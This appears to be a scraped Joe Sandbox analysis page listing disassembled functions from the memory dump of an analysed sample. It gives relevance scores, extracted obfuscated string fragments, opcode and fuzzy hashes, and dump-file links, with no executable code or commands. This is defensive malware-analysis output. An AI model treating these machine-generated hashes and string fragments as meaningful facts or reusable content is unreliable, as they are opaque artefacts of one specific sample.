                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %e6g$(a*c$=]$?m,o$CG$Gt$JG$N[$WH$]{$hi$kW$/)$S]$WQ$_Y$sm
                                                                                                                                                            • API String ID: 0-1131134755
                                                                                                                                                            • Opcode ID: 65c528b25f5e236782d4d2206b3526a8499b97f7afac6c1eae80fe928db288e7
                                                                                                                                                            • Instruction ID: 38a6389aac161517c08622e9b670165aa7d7fa4b750672acd33ffbdb1d7630f4
                                                                                                                                                            • Opcode Fuzzy Hash: 65c528b25f5e236782d4d2206b3526a8499b97f7afac6c1eae80fe928db288e7
                                                                                                                                                            • Instruction Fuzzy Hash: 9A52B6B444D3858AE270CF26D581B9EBAF1BB92740F608E1DE1ED9B255DBB08045CF93
                                                                                                                                                            Function 00BB9510 Relevance: 20.4, Strings: 16, Instructions: 427COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: !E4G$,A&C$2A"_$8;$;IJK$?M0K$B7U1$B?Q9$G'M!$G+X5$L3Y=$O+f)$T#a-$X/R)$pq$z=Q?
                                                                                                                                                            • API String ID: 0-655414846
                                                                                                                                                            • Opcode ID: 199869c336b81e295fe4b683b952170eaf7cc004c3c506b07a4cb0e55a220fbc
                                                                                                                                                            • Instruction ID: bc4f2bde178a97cd0104bccd6f0ff27fe54027c0310c793a78206a09682bca36
                                                                                                                                                            • Opcode Fuzzy Hash: 199869c336b81e295fe4b683b952170eaf7cc004c3c506b07a4cb0e55a220fbc
                                                                                                                                                            • Instruction Fuzzy Hash: 8EF14EB0518380ABD310DF15D881A6BBBF4FB86B48F444D5CF5D99B252D3B4D908CBA6
                                                                                                                                                            Function 00BBDD29 Relevance: 14.9, Strings: 11, Instructions: 1142COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %*+($)IgK$,Q?S$-M2O$<Y.[$=]+_$Y9N;$hX]N$n\+H$upH}${E
                                                                                                                                                            • API String ID: 0-1557708024
                                                                                                                                                            • Opcode ID: 0c6485e8c4a3e998075da0f64a62051deb6d7ad042bdb9d01943a904e30c38ac
                                                                                                                                                            • Instruction ID: 18e2e39d866b1429be1e8e24d7bdcdc21c18d4b115d3d143aaecd18f3e597783
                                                                                                                                                            • Opcode Fuzzy Hash: 0c6485e8c4a3e998075da0f64a62051deb6d7ad042bdb9d01943a904e30c38ac
                                                                                                                                                            • Instruction Fuzzy Hash: 2892DE71E00245CFDB14CF68D8816AEBBF2FF49310F2981A8E456AB3A1D775AD41CB90
                                                                                                                                                            Function 00D5B2E9 Relevance: 14.2, Strings: 10, Instructions: 1656COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: "=;$#;}u$:B~>$Bz$RRo_$^'G?$ezw$fsz$xn%#$gc{
                                                                                                                                                            • API String ID: 0-250507521
                                                                                                                                                            • Opcode ID: 57a75fa49c6df039e8e3020e5b4a321baf68fd3eeee067c180287eca5fccd657
                                                                                                                                                            • Instruction ID: 1c9ccc3c507cac0163d885fbdfa3d18ff272b3c2e2669af35ee0c128c304d668
                                                                                                                                                            • Opcode Fuzzy Hash: 57a75fa49c6df039e8e3020e5b4a321baf68fd3eeee067c180287eca5fccd657
                                                                                                                                                            • Instruction Fuzzy Hash: 3CB22BF3A082009FE3146E2DDC8567AFBE6EFD4720F1A863DE6C4D7744EA3558058692
                                                                                                                                                            Function 00BB098B Relevance: 10.8, Strings: 8, Instructions: 836COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %*+($&> &$,#15$9.5^$cah`$gce/$qrqp${
                                                                                                                                                            • API String ID: 0-4102007303
                                                                                                                                                            • Opcode ID: 8c23f5342319b6749bf7d695928f6dcba0353bbb6f7ee90c32dff41043b9c459
                                                                                                                                                            • Instruction ID: 61ccb91b5d89685a47866f9766ec2ddd9384b1b6704779d54b24fcdf302de6f2
                                                                                                                                                            • Opcode Fuzzy Hash: 8c23f5342319b6749bf7d695928f6dcba0353bbb6f7ee90c32dff41043b9c459
                                                                                                                                                            • Instruction Fuzzy Hash: 9862A9B16183818BD730DF18D891BABBBE1FF96314F084D6DE49A8B641E7B59840CB53
                                                                                                                                                            Function 00B91000 Relevance: 10.5, Strings: 7, Instructions: 1785COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$@$gfff$gfff$gfff
                                                                                                                                                            • API String ID: 0-2517803157
                                                                                                                                                            • Opcode ID: 2a7c484a1edb902fae9a35e42338950340f4ca623666db74a752173b507661ec
                                                                                                                                                            • Instruction ID: 36838df2e51a2e8a716cd7ca2e06d7fc6502b8c97122a17c3caec3ef33a1e059
                                                                                                                                                            • Opcode Fuzzy Hash: 2a7c484a1edb902fae9a35e42338950340f4ca623666db74a752173b507661ec
                                                                                                                                                            • Instruction Fuzzy Hash: A0D2D371A083529FDB18CF28C49436ABBE2EFD5314F188ABDE49987391D734D945CB82
                                                                                                                                                            Function 00D621F2 Relevance: 8.8, Strings: 6, Instructions: 1282COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: !%=o$2{$AGn$[3_$'k/$=/
                                                                                                                                                            • API String ID: 0-4186158839
                                                                                                                                                            • Opcode ID: 7b81d73b601ecb763c082b6fb16ef3d3a73fb024a416562dc17d81535d692d57
                                                                                                                                                            • Instruction ID: d5d2a784b9a2234e3b080708dfe9a9af92af9b383513611b7771c4ade09c2ca8
                                                                                                                                                            • Opcode Fuzzy Hash: 7b81d73b601ecb763c082b6fb16ef3d3a73fb024a416562dc17d81535d692d57
                                                                                                                                                            • Instruction Fuzzy Hash: 238205F360C2049FE304AF29EC8567AFBE9EF94720F16893DE6C4C7344EA3558458696
                                                                                                                                                            Function 00D51280 Relevance: 7.9, Strings: 5, Instructions: 1658COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: AR;}$|O$>$$lK}$48
                                                                                                                                                            • API String ID: 0-3886521666
                                                                                                                                                            • Opcode ID: 06306217f99e81680e39bec5a7cfc545128a1c22f25180d31c6e23593c49c4ef
                                                                                                                                                            • Instruction ID: 241eef648a6d6615120478e144f7aa17aa0a281ee5869f600e72b7aa3ed464e2
                                                                                                                                                            • Opcode Fuzzy Hash: 06306217f99e81680e39bec5a7cfc545128a1c22f25180d31c6e23593c49c4ef
                                                                                                                                                            • Instruction Fuzzy Hash: FEB226F360C204AFE3046E2DEC8567AFBE9EF94720F164A3DEAC4C3744E67558058696
                                                                                                                                                            Function 00B912F7 Relevance: 7.2, Strings: 5, Instructions: 922COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 0$0$0$@$i
                                                                                                                                                            • API String ID: 0-3124195287
                                                                                                                                                            • Opcode ID: d9542b282d7fd5990e1afff9a96f6444b84b1cc814ebc960ca0ec7d13215175a
                                                                                                                                                            • Instruction ID: d8d012ce33ac16d00980b82cfa52bfb7ae6658f8e08cc91316a2f56c4e1e5023
                                                                                                                                                            • Opcode Fuzzy Hash: d9542b282d7fd5990e1afff9a96f6444b84b1cc814ebc960ca0ec7d13215175a
                                                                                                                                                            • Instruction Fuzzy Hash: 3D62C271A0C3829BDB19CF28C49076ABBE1EF95304F188DBDE8D987291D774D945CB82
                                                                                                                                                            Function 00B9164F Relevance: 6.7, Strings: 5, Instructions: 472COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: +$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff
                                                                                                                                                            • API String ID: 0-1123320326
                                                                                                                                                            • Opcode ID: 5383ccb09c498db82ee5725c5f125e6f8fb8932af963670ee0d1255f5828deed
                                                                                                                                                            • Instruction ID: af364915c6e537b999b6f9b5640ddd82350568e0e2c6aaf243bda8c892e9ab19
                                                                                                                                                            • Opcode Fuzzy Hash: 5383ccb09c498db82ee5725c5f125e6f8fb8932af963670ee0d1255f5828deed
                                                                                                                                                            • Instruction Fuzzy Hash: 4EF19331A0C3819FCB15CF29C49426AFBE1ABD9304F18CAADE4D987352D734D945DB92
                                                                                                                                                            Function 00B913A3 Relevance: 6.6, Strings: 5, Instructions: 390COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff
                                                                                                                                                            • API String ID: 0-3620105454
                                                                                                                                                            • Opcode ID: 57fc59326ba70456c357bff6655502054054fd80da9e5b956e5a4a2ba1792f98
                                                                                                                                                            • Instruction ID: b32f4cb3eb57ec083e72f85edd9427665c1cc4879da1396ca764baee27d4369e
                                                                                                                                                            • Opcode Fuzzy Hash: 57fc59326ba70456c357bff6655502054054fd80da9e5b956e5a4a2ba1792f98
                                                                                                                                                            • Instruction Fuzzy Hash: DFD17E356087829FCB15CF29C48426AFBE2ABD9304F08CAADE4D987356D634D949CB52
                                                                                                                                                            Function 00D5E81F Relevance: 6.6, Strings: 4, Instructions: 1617COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: T5Z$W[ \$ _$s%u
                                                                                                                                                            • API String ID: 0-2019073790
                                                                                                                                                            • Opcode ID: 2dbea3ec6fc30fc2625be22b78499056a36e08d7cb4aa339573b69c2df3d95df
                                                                                                                                                            • Instruction ID: 5c795f36594292884580cc461b7d63acaeec85b2611725180f560f4aefb777b4
                                                                                                                                                            • Opcode Fuzzy Hash: 2dbea3ec6fc30fc2625be22b78499056a36e08d7cb4aa339573b69c2df3d95df
                                                                                                                                                            • Instruction Fuzzy Hash: 56B2F6F3608204AFE304AE2DEC8567AF7E9EF94720F1A453DEAC5C3740EA3559058696
                                                                                                                                                            Function 00BBFD10 Relevance: 5.7, Strings: 4, Instructions: 667COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: :$NA_I$m1s3$uvw
                                                                                                                                                            • API String ID: 0-3973114637
                                                                                                                                                            • Opcode ID: 7717c1e47f2c6a07019688ec77de45e732d8ed3bd9f068185cee8165f0e7e653
                                                                                                                                                            • Instruction ID: 39e7cd494d54ab88171fb7f067fb3e9e9ac17c16ea888592b46004104eecef75
